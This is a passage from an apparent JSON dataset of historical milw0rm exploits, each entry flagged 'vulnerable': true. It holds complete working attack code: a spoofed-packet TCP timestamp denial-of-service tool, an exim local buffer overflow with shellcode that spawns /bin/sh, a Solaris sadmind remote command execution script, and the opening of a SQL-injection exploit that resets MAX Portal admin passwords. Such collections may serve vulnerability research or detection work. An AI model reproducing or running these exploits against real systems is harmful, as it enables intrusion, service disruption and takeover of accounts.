suggests an slightly different check like\n\n*\n\n* (2) If: SEG.TSval >= TSrecent and SEG.SEQ <= Last.ACK.sent\n\n* then SEG.TSval is copied to TS.Recent; otherwise, it is\n\n* ignored.\n\n*\n\n* and explains this change\n\n*\n\n* APPENDIX C: CHANGES FROM RFC-1072, RFC-1185, RFC-1323\n\n*\n\n* There are additional changes in this document from RFC-1323.\n\n* These changes are:\n\n* (b) In RFC-1323, section 3.4, step (2) of the algorithm to control\n\n* which timestamp is echoed was incorrect in two regards:\n\n* (1) It failed to update TSrecent for a retransmitted segment\n\n* that resulted from a lost ACK.\n\n* (2) It failed if SEG.LEN = 0.\n\n* In the new algorithm, the case of SEG.TSval = TSrecent is\n\n* included for consistency with the PAWS test.\n\n*\n\n* At least OpenBSD and FreeBSD contain this code instead:\n\n*\n\n* sys/netinet/tcp_input.c tcp_input()\n\n*\n\n* **\n\n* * If last ACK falls within this segment's sequence numbers,\n\n* * record its timestamp.\n\n* * NOTE that the test is modified according to the latest\n\n* * proposal of the tcplw@cray.com list (Braden 1993/04/26).\n\n* **\n\n* if ((to.to_flags & TOF_TS) != 0 &&\n\n* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {\n\n* tp->ts_recent_age = ticks;\n\n* tp->ts_recent = to.to_tsval;\n\n* }\n\n*\n\n* The problem here is that the packet the timestamp is accepted from doesn't\n\n* need to have a valid th_seq or th_ack. This point of execution is reached\n\n* for packets with arbitrary th_ack values and th_seq values of half the\n\n* possible value range, because the first 'if (todrop > tlen)' check in the\n\n* function explicitely continues execution to process ACKs.\n\n*\n\n* If an attacker knows (or guesses) the source and destination addresses and\n\n* ports of a connection between two peers, he can send spoofed TCP packets\n\n* to either peer containing bogus timestamp options. Since half of the\n\n* possible th_seq and timestamp values are accepted, four packets containing\n\n* two random values and their integer wraparound opposites are sufficient to\n\n* get one random timestamp accepted by the receipient. Further packets from\n\n* the real peer will get dropped by PAWS, and the TCP connection stalls and\n\n* times out.\n\n*\n\n* The following change reverts the tcp_input() check back to the implemented\n\n* suggested by draft-jacobson-tsvwg-1323bis-00.txt\n\n*\n\n* if (opti.ts_present && TSTMP_GEQ(opti.ts_val, tp->ts_recent) &&\n\n* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {\n\n* + if (SEQ_LEQ(tp->last_ack_sent, th->th_seq + tlen +\n\n* + ((tiflags & (TH_SYN|TH_FIN)) != 0)))\n\n* + tp->ts_recent = opti.ts_val;\n\n* + else\n\n* + tp->ts_recent = 0;\n\n* tp->ts_recent_age = tcp_now;\n\n* - tp->ts_recent = opti.ts_val;\n\n* }\n\n*\n\n* I can't find Braden's proposal referenced in the comment. It seems to\n\n* pre-date draft-jacobson-tsvwg-1323bis-00.txt and might be outdated by\n\n* it.\n\n*\n\n* Fri Mar 11 02:33:36 MET 2005 Daniel Hartmeier <daniel@benzedrine.cx>\n\n*\n\n* http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/tcp_input.c.diff\\\n\n* ?r1=1.184&r2=1.185&f=h\n\n*\n\n* http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c.diff\\\n\n* ?r1=1.252.2.15&r2=1.252.2.16&f=h\n\n*\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <sys/socket.h>\n\n#include <net/if.h>\n\n#ifdef __FreeBSD__\n\n#include <net/if_var.h>\n\n#endif\n\n#include <netinet/in.h>\n\n#include <netinet/in_var.h>\n\n#include <netinet/in_systm.h>\n\n#include <netinet/ip.h>\n\n#include <netinet/tcp.h>\n\n\n\nstatic u_int16_t\n\nchecksum(u_int16_t *data, u_int16_t length)\n\n{\n\nu_int32_t value = 0;\n\nu_int16_t i;\n\n\n\nfor (i = 0; i < (length >> 1); ++i)\n\nvalue += data[i];\n\nif ((length & 1) == 1)\n\nvalue += (data[i] << 8);\n\nvalue = (value & 65535) + (value >> 16);\n\nreturn (~value);\n\n}\n\n\n\nstatic int\n\nsend_tcp(int sock, u_int32_t saddr, u_int32_t daddr, u_int16_t sport,\n\nu_int16_t dport, u_int32_t seq, u_int32_t ts)\n\n{\n\nu_char packet[1600];\n\nstruct tcphdr *tcp;\n\nstruct ip *ip;\n\nunsigned char *opt;\n\nint optlen, len, r;\n\nstruct sockaddr_in sin;\n\n\n\nmemset(packet, 0, sizeof(packet));\n\n\n\nopt = packet + sizeof(struct ip) + sizeof(struct tcphdr);\n\noptlen = 0;\n\nopt[optlen++] = TCPOPT_NOP;\n\nopt[optlen++] = TCPOPT_NOP;\n\nopt[optlen++] = TCPOPT_TIMESTAMP;\n\nopt[optlen++] = 10;\n\nts = htonl(ts);\n\nmemcpy(opt + optlen, &ts, sizeof(ts));\n\noptlen += sizeof(ts);\n\nts = htonl(0);\n\nmemcpy(opt + optlen, &ts, sizeof(ts));\n\noptlen += sizeof(ts);\n\n\n\nlen = sizeof(struct ip) + sizeof(struct tcphdr) + optlen;\n\n\n\nip = (struct ip *)packet;\n\nip->ip_src.s_addr = saddr;\n\nip->ip_dst.s_addr = daddr;\n\nip->ip_p = IPPROTO_TCP;\n\nip->ip_len = htons(sizeof(struct tcphdr) + optlen);\n\n\n\ntcp = (struct tcphdr *)(packet + sizeof(struct ip));\n\ntcp->th_sport = htons(sport);\n\ntcp->th_dport = htons(dport);\n\ntcp->th_seq = htonl(seq);\n\ntcp->th_ack = 0;\n\ntcp->th_off = (sizeof(struct tcphdr) + optlen) / 4;\n\ntcp->th_flags = 0;\n\ntcp->th_win = htons(16384);\n\ntcp->th_sum = 0;\n\ntcp->th_urp = 0;\n\n\n\ntcp->th_sum = checksum((u_int16_t *)ip, len);\n\n\n\nip->ip_v = 4;\n\nip->ip_hl = 5;\n\nip->ip_tos = 0;\n\nip->ip_len = htons(len);\n\nip->ip_id = htons(arc4random() % 65536);\n\nip->ip_off = 0;\n\nip->ip_ttl = 64;\n\n\n\nsin.sin_family = AF_INET;\n\nsin.sin_addr.s_addr = saddr;\n\n\n\nr = sendto(sock, packet, len, 0, (struct sockaddr *)&sin, sizeof(sin));\n\nif (r != len) {\n\nperror(\"sendto\");\n\nreturn (1);\n\n}\n\n\n\nreturn (0);\n\n}\n\n\n\nstatic u_int32_t\n\nop(u_int32_t u)\n\n{\n\nreturn (u_int32_t)(((u_int64_t)u + 2147483648UL) % 4294967296ULL);\n\n}\n\n\n\nint main(int argc, char *argv[])\n\n{\n\nu_int32_t saddr, daddr, seq, ts;\n\nu_int16_t sport, dport;\n\nint sock, i;\n\n\n\nif (argc != 5) {\n\nfprintf(stderr, \"usage: %s <src ip> <src port> \"\n\n\"<dst ip> <dst port>\\n\", argv[0]);\n\nreturn (1);\n\n}\n\n\n\nsaddr = inet_addr(argv[1]);\n\ndaddr = inet_addr(argv[3]);\n\nsport = atoi(argv[2]);\n\ndport = atoi(argv[4]);\n\n\n\nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);\n\nif (sock < 0) {\n\nperror(\"socket\");\n\nreturn (1);\n\n}\n\ni = 1;\n\nif (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1) {\n\nperror(\"setsockopt\");\n\nclose(sock);\n\nreturn (1);\n\n}\n\n\n\nseq = arc4random();\n\nts = arc4random();\n\nif (send_tcp(sock, saddr, daddr, sport, dport, seq, ts) ||\n\nsend_tcp(sock, saddr, daddr, sport, dport, seq, op(ts)) ||\n\nsend_tcp(sock, saddr, daddr, sport, dport, op(seq), ts) ||\n\nsend_tcp(sock, saddr, daddr, sport, dport, op(seq), op(ts))) {\n\nfprintf(stderr, \"failed\\n\");\n\nclose(sock);\n\nreturn (1);\n\n}\n\n\n\nclose(sock);\n\nprintf(\"done\\n\");\n\nreturn (0);\n\n}\n\n\n\n// milw0rm.com [2005-05-21]",
55        "vulnerable": true
56    },
57    {
58        "exploit_id": 1009,
59        "content": "/* \n\n * ripped straight off iDEFENSE advisory - so lazy I just picked\n\n * up GDB... bored on a weeknight :(\n\n * \n\n * nothing to write home to mother about due to the fact that\n\n * you need a local user account on a server and all you\n\n * get is to read other people's emails ....\n\n * \n\n * not even my own shellcode. aleph1 shellcode - cut and paste job \n\n * with nops to pad.\n\n *\n\n * Regards,\n\n * Plugger aka Tony Lockett\n\n *\n\n * \n\n * \n\n */\n\n\n\nchar bomb[288]=\n\n\n\n/* the gear from iDEFENSE */\n\n\"::%A:::::::::::::::::\"                             /* 21 bytes  */\n\n                                                    /* --------  */\n\n/* NOPS for padding */\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x90\\x90\"                                          /* 218 bytes */\n\n                                                    /* --------- */\n\n/* actual code courtesy Aleph1 */\n\n\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\"  /* 12 bytes  */\n\n\"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\"  /* 12 bytes  */\n\n\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\"              /* 9 bytes   */\n\n\"\\xe8\\xdc\\xff\\xff\\xff/bin/sh\"                       /* 12 bytes  */\n\n\n\n/* where EIP should point */\n\n\"\\xf4\\xf2\\xff\\xbf\";                                 /*  4 bytes  */\n\n                                                    /* --------  */\n\n                                                    /* 49 bytes  */\n\n                                                    /* --------  */\n\n                                                    /* 288 bytes */\n\n                                                    /* ========= */\n\nmain()\n\n{\n\n  char *exim[4];\n\n  exim[0] = \"/usr/exim/bin/exim\";\n\n  exim[1] = \"-bh\";\n\n  exim[2] = bomb;\n\n  exim[3] = 0x0;\n\n  printf(\"Firing up exim - cross your fingers for shell!\\n\");\n\n  execve(exim[0],exim,0x0);\n\n  return;\n\n}\n\n\n\n// milw0rm.com [2005-05-25]",
60        "vulnerable": true
61    },
62    {
63        "exploit_id": 101,
64        "content": "#!/usr/bin/perl -w\n\n##################\n\n\n\n##\n\n#      Title: rootdown.pl\n\n#      Purpose: Solaris Remote command executiong via sadmind\n\n#      Author: H D Moore hdm at metasploit.com\n\n#      Copyright: Copyright (C) 2003 METASPLOIT.COM\n\n##\n\n\n\n\n\nuse strict;\n\nuse POSIX;\n\nuse IO::Socket;\n\nuse IO::Select;\n\nuse Getopt::Std;\n\n\n\nmy $VERSION = \"1.0\";\n\nmy %opts;\n\n\n\ngetopts(\"h:p:c:r:iv\", \\%opts);\n\n\n\nif ($opts{v}) { show_info() }\n\n\n\nif (! $opts{h}) { usage() }\n\n\n\nmy $target_host = $opts{h};\n\n\n\nmy $target_name = \"exploit\";\n\n\n\nmy $command = $opts{c} ? $opts{c} : \"touch /tmp/OWNED_BY_SADMIND_\\$\\$\";\n\nmy $portmap = $opts{r} ? $opts{r} : 111;\n\n\n\n\n\n##\n\n# Determine the port used by sadmind  \n\n##\n\n\n\nmy $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);\n\n\n\nif (! $target_port)\n\n{\n\n    print STDERR \"Error: could not determine port used by sadmind\\n\";\n\n    exit(0);\n\n}\n\n\n\n##\n\n#  Determine the hostname of the target\n\n##\n\n\n\nmy $s = rpc_socket($target_host, $target_port);\n\nmy $x = rpc_sadmin_exec($target_name, \"id\");\n\nprint $s $x;\n\nmy $r = rpc_read($s);\n\nclose ($s);\n\n\n\nif ($r && $r =~ m/Security exception on host (.*)\\.  USER/)\n\n{\n\n    $target_name = $1;\n\n} else {\n\n    print STDERR \"Error: could not obtain target hostname.\\n\";\n\n    exit(0);\n\n}\n\n\n\n\n\n##\n\n#  Execute commands :)\n\n##\n\n\n\n\n\nmy $interactive = 0;\n\n\n\nif ($opts{i}) { $interactive++ }\n\n\n\ndo {\n\n\n\n    if ($opts{i}) { $command = command_prompt() } else \n\n    {\n\n        print STDERR \"Executing command on '$target_name' via port $target_port\\n\";\n\n    }\n\n    \n\n    $s = rpc_socket($target_host, $target_port);\n\n    $x = rpc_sadmin_exec($target_name, $command);\n\n    print $s $x;\n\n    $r = rpc_read($s);\n\n    close ($s);\n\n\n\n    if ($r) \n\n    {  \n\n        # Command Failed\n\n        if (length($r) == 36 && substr($r, 24, 4) eq \"\\x00\\x00\\x00\\x29\")\n\n        {\n\n            print STDERR \"Error: something went wrong with the RPC format.\\n\";\n\n            exit(0);\n\n        }\n\n\n\n        # Command might have failed\n\n        if (length($r) == 36 && substr($r, 24, 4) eq \"\\x00\\x00\\x00\\x2b\")\n\n        {\n\n            print STDERR \"Error: something may have gone wrong with the sadmind format\\n\";\n\n        }\n\n\n\n        # Confirmed success\n\n        if (length($r) == 36 && substr($r, 24, 12) eq (\"\\x00\" x 12))\n\n        {\n\n            print STDERR \"Success: your command has been executed successfully.\\n\";\n\n        }    \n\n\n\n        if (length($r) != 36)  { print STDERR \"Unknown Response: $r\\n\" }\n\n        \n\n    } else {\n\n        print STDERR \"Error: no response recieved, you may want to try again.\\n\";\n\n        exit(0);\n\n    }\n\n    \n\n} while ($interactive);\n\n\n\nexit(0);\n\n\n\nsub usage {\n\n    print STDERR \"\\n\";\n\n    print STDERR \"+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\\n\\n\";\n\n    print STDERR \"       Usage:   $0 -h <target> -c <command> [options]\\n\";\n\n    print STDERR \"     Options:\\n\";\n\n    print STDERR \"                -i\\tStart interactive mode (for multiple commands)\\n\";\n\n    print STDERR \"                -p\\tAvoid the portmapper and use this sadmind port\\n\";   \n\n    print STDERR \"                -r\\tQuery alternate portmapper on this UDP port\\n\";\n\n    print STDERR \"                -v\\tDisplay information about this exploit\\n\";    \n\n    \n\n    print STDERR \"\\n\\n\";\n\n    exit(0);\n\n}\n\n\n\nsub show_info {\n\n\n\nprint \"\\n\\n\";\n\nprint \"   Name:  rootdown.pl\\n\";\n\nprint \" Author:  H D Moore <hdm\\@metasploit.com>\\n\";\n\nprint \"Version:  $VERSION\\n\\n\";\n\n\n\n# not finsihed :)\n\nprint \n\n\"This exploit targets a weakness in the default security settings\n\nof the sadmind RPC application. This application is installed and\n\nenabled by default on most versions of the Solaris operating\n\nsystem.\\n\\n\".\n\n\n\n\"The sadmind application defaults to a weak security mode known as\n\nAUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,\n\nthe service will accept a structure containing the user and group\n\nIDs as well as the originating system name. These values are not\n\nvalidated in any form and are completely controlled by the client.\n\nIf the standard sadmin RPC API calls are used to generate the request,\n\nthe ADM_CLIENT_HOST parameter is filled in with the hostname of the \n\nclient system. If the RPC packet is modified so that this field is\n\nset to the hostname of the remote system, it will be processed as \n\nif it was a local request. If the user ID is set to zero or the\n\nvalue of any user in the sysadmin group, it is possible to call\n\narbitrary methods in any class available to sadmind.\\n\\n\".\n\n\n\n\"If the Solstice AdminSuite client software has not been installed,\n\nthe only class available is 'system', which only contains a single\n\nmethod called 'admpipe'. The strings within this program seem to\n\nsuggest that it can be used run arbitrary commands, however I chose\n\na different method of command execution. Since each method is simply \n\nan executable in the class directory, it is possible to use a \n\nstandard directory traversal attack to execute any application.\n\nWe can pass arguments to these methods using the standard API.\n\n\n\nAn example of spawning a shell which executes the 'id' command:\n\n\n\n    # apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\\n\\n\".\n\n\n\n\"To exploit this vulnerability, we must create a RPC packet that\n\ncalls the '/bin/sh' method, passing it the parameter of the command\n\nwe want to execute. To do this, packet dumps of the 'apm' tool\n\nwere obtained and the format was slowly mapped. The hostname of \n\nthe target system must be known for this exploit to work, however\n\nwhen sadmind is called with the wrong name, it replies with a\n\n'ACCESS DENIED' error message containing the correct name. The \n\nfinal code does the following:\n\n\n\n1) Queries the portmapper to determine the sadmind port\n\n2) Sends an invalid request to sadmind to obtain the hostname\n\n3) Uses the hostname to forge the RPC packet and execute commands\n\n\n\n\n\nThis vulnerability was reported by Mark Zielinski and disclosed by iDefense.\n\n\n\nRelated URLs:\n\n\n\n - http://www.idefense.com/advisory/09.16.03.txt\n\n - http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view\n\n\";\n\n\n\n\n\n\n\n\n\n\n\nexit(0);\n\n}\n\n\n\nsub command_prompt {\n\n    select(STDOUT); $|++;\n\n    \n\n    print STDOUT \"\\nsadmind> \";\n\n    my $command = <STDIN>;\n\n    chomp($command);\n\n    if (! $command || lc($command) eq \"quit\" || lc($command) eq \"exit\")\n\n    {\n\n        print \"\\nExiting interactive mode...\\n\";\n\n        exit(0);\n\n    }\n\n    return ($command)\n\n}\n\n\n\nsub rpc_socket {\n\n    my ($target_host, $target_port) = @_;\n\n    my $s = IO::Socket::INET->new\n\n    (\n\n        PeerAddr => $target_host, \n\n        PeerPort => $target_port,\n\n        Proto    => \"udp\",\n\n        Type     => SOCK_DGRAM\n\n    );\n\n\n\n    if (! $s)\n\n    {\n\n        print \"\\nError: could not create socket to target: $!\\n\";\n\n        exit(0);\n\n    }\n\n\n\n    select($s); $|++;\n\n    select(STDOUT); $|++;\n\n    nonblock($s);\n\n    return($s);\n\n}\n\n\n\nsub rpc_read {\n\n    my ($s) = @_;\n\n    my $sel = IO::Select->new($s);\n\n    my $res;\n\n    my @fds = $sel->can_read(4);\n\n    foreach (@fds) { $res .= <$s>; }\n\n    return $res;\n\n}\n\n\n\nsub nonblock {\n\n    my ($fd) = @_;\n\n    my $flags = fcntl($fd, F_GETFL,0);\n\n    fcntl($fd, F_SETFL, $flags|O_NONBLOCK);\n\n}\n\n\n\nsub rpc_getport {\n\n    my ($target_host, $target_port, $prog, $vers) = @_;\n\n    \n\n    my $s = rpc_socket($target_host, $target_port);\n\n\n\n    my $portmap_req =\n\n        \n\n        pack(\"L\", rand() * 0xffffffff) . # XID\n\n        \"\\x00\\x00\\x00\\x00\".              # Call\n\n        \"\\x00\\x00\\x00\\x02\".              # RPC Version\n\n        \"\\x00\\x01\\x86\\xa0\".              # Program Number  (PORTMAP)\n\n        \"\\x00\\x00\\x00\\x02\".              # Program Version (2)\n\n        \"\\x00\\x00\\x00\\x03\".              # Procedure (getport)\n\n        (\"\\x00\" x 16).                   # Credentials and Verifier\n\n        pack(\"N\", $prog) .\n\n        pack(\"N\", $vers).\n\n        pack(\"N\", 0x11).                 # Protocol: UDP\n\n        pack(\"N\", 0x00);                 # Port: 0\n\n\n\n    print $s $portmap_req;\n\n\n\n    my $r = rpc_read($s);\n\n    close ($s);\n\n    \n\n    if (length($r) == 28) \n\n    { \n\n        my $prog_port = unpack(\"N\",substr($r, 24, 4));\n\n        return($prog_port); \n\n    }\n\n    \n\n    return undef;\n\n}\n\n\n\n\n\nsub rpc_sadmin_exec {\n\n\n\n    my ($hostname, $command) = @_;\n\n    my $packed_host = $hostname . (\"\\x00\" x (59 - length($hostname)));\n\n    \n\n    \n\n    my $rpc =\n\n        pack(\"L\", rand() * 0xffffffff) . # XID\n\n        \"\\x00\\x00\\x00\\x00\".              # Call\n\n        \"\\x00\\x00\\x00\\x02\".              # RPC Version\n\n        \"\\x00\\x01\\x87\\x88\".              # Program Number  (SADMIND)\n\n        \"\\x00\\x00\\x00\\x0a\".              # Program Version (10)\n\n        \"\\x00\\x00\\x00\\x01\".              # Procedure\n\n        \"\\x00\\x00\\x00\\x01\";              # Credentials (UNIX)\n\n                                         # Auth Length is filled in\n\n\n\n    # pad it up to multiples of 4\n\n    my $rpc_hostname = $hostname;\n\n    while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= \"\\x00\" }\n\n    \n\n    my $rpc_auth =\n\n        # Time Stamp\n\n        pack(\"N\", time() + 20001) .\n\n\n\n        # Machine Name\n\n        pack(\"N\", length($hostname)) . $rpc_hostname .\n\n\n\n        \"\\x00\\x00\\x00\\x00\".              # UID = 0\n\n        \"\\x00\\x00\\x00\\x00\".              # GID = 0\n\n        \"\\x00\\x00\\x00\\x00\";              # No Extra Groups  \n\n\n\n\n\n    $rpc .= pack(\"N\", length($rpc_auth)) . $rpc_auth . (\"\\x00\" x 8);\n\n\n\n    my $header =\n\n    \n\n    # Another Time Stamp\n\n    reverse(pack(\"L\", time() + 20005)) .\n\n\n\n    \"\\x00\\x07\\x45\\xdf\".\n\n    \n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\".\n\n    \n\n    \"\\x7f\\x00\\x00\\x01\".                 # 127.0.0.1\n\n    \"\\x00\\x01\\x87\\x88\".                 # SADMIND\n\n    \n\n    \"\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x04\".\n\n    \n\n    \"\\x7f\\x00\\x00\\x01\".                 # 127.0.0.1\n\n    \"\\x00\\x01\\x87\\x88\".                 # SADMIND\n\n\n\n    \"\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x1e\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x00\".\n\n\n\n    \"\\x00\\x00\\x00\\x3b\". $packed_host.\n\n\n\n    \"\\x00\\x00\\x00\\x00\\x06\" . \"system\".\n\n    \n\n    \"\\x00\\x00\\x00\\x00\\x00\\x15\". \"../../../../../bin/sh\". \"\\x00\\x00\\x00\";\n\n    \n\n    # Append Body Length ^-- Here\n\n\n\n    my $body = \n\n    \"\\x00\\x00\\x00\\x0e\". \"ADM_FW_VERSION\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\".\n\n    \"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \"\\x00\\x00\\x00\\x08\". \"ADM_LANG\".\n\n    \"\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x02\\x00\\x00\".\n\n    \"\\x00\\x01\". \"C\" . \n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \"\\x00\\x00\\x00\\x0d\". \"ADM_REQUESTID\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x11\".\n\n    \"0810:1010101010:1\".\"\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n\n\n    \"\\x00\\x00\\x00\\x09\". \"ADM_CLASS\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x07\".\n\n    \"\\x00\\x00\\x00\\x06\" . \"system\" .\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \n\n    \"\\x00\\x00\\x00\\x0e\" . \"ADM_CLASS_VERS\" .\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x04\".\n\n    \"\\x00\\x00\\x00\\x03\". \"2.1\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \n\n    \"\\x00\\x00\\x00\\x0a\" . \"ADM_METHOD\" . \n\n    \"\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x16\".\n\n    \"\\x00\\x00\\x00\\x15\". \"../../../../../bin/sh\" . \n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \"\\x00\\x00\\x00\\x08\". \"ADM_HOST\" .\n\n    \"\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x3c\\x00\\x00\\x00\\x3b\".\n\n    $packed_host.\n\n\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x0f\". \"ADM_CLIENT_HOST\".\n\n    \"\\x00\\x00\\x00\\x00\\x09\".\n\n    \n\n    pack(\"N\", length($hostname) + 1) .\n\n    pack(\"N\", length($hostname)) .\n\n    $rpc_hostname .\n\n    \"\\x00\\x00\\x00\\x00\". \"\\x00\\x00\\x00\\x00\".\n\n    \n\n    \"\\x00\\x00\\x00\\x11\" . \"ADM_CLIENT_DOMAIN\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \"\\x00\\x00\\x00\\x11\" . \"ADM_TIMEOUT_PARMS\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x09\\x00\\x00\\x00\\x1c\".\n\n    \"\\x00\\x00\\x00\\x1b\" . \"TTL=0 PTO=20 PCNT=2 PDLY=30\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \n\n    \n\n    \"\\x00\\x00\\x00\\x09\" . \"ADM_FENCE\" .\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x58\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\".\n\n    \"\\x00\\x00\\x03\\x00\\x00\\x00\\x02\" . \"-c\" .\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x59\\x00\".\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x02\\x01\\x00\\x00\\x02\\x00\".\n\n\n\n    $command . (\"\\x00\" x (512 - length($command))).\n\n\n\n    \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\".\n\n    \"netmgt_endofargs\";\n\n\n\n    my $res = $rpc . $header . pack(\"N\", (length($body) + 4 + length($header)) - 330) . $body;\n\n\n\n    return($res);\n\n}\n\n\n\n\n\n\n\n# milw0rm.com [2003-09-19]",
65        "vulnerable": true
66    },
67    {
68        "exploit_id": 1010,
69        "content": "#!/usr/bin/perl\n\n#################################################################\n\n#    T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m\n\n#################################################################\n\n# EXPLOIT FOR - MAX Portal (All Versions)\n\n#\n\n#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );\n\n#E-Mail : Alpha_Programmer@Yahoo.com\n\n#\n\n#This Xpl Change Admin's Pass in This Portal !!\n\n#\n\n#Discovered by: s d <irsdl@yahoo.com>\n\n#\n\n#################################################################\n\n#  Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke   &  AlphaST.Com\n\n#\n\n#And Iranian Hacking & Security Teams :\n\n# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev\n\n#################################################################\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 2)\n\n{\n\n print \"\\n==========================================\\n\";\n\n print \" \\n     -- Exploit By Alpha Programmer --\\n\\n\";\n\n print \"     Trap-Set Underground Hacking Team      \\n\\n\";\n\n print \"      Usage: Max.pl <T4rg3t> <V3rsion>\\n\\n\";\n\n print \" V3rsion :\\n\";\n\n print \" 1 ==>   Version 1.35 and 0lder\\n\";\n\n print \" 2 ==>   Version 1.36, 2.0 and Next\\n\";\n\n print \"==========================================\\n\\n\";\n\n print \"Example:\\n\\n\";\n\n print \"    Max.pl www.Site.com 1\\n\";\n\n exit();\n\n}\n\n$hell = \"foo' or M_Name='admin\";\n\nif ($ARGV[1] 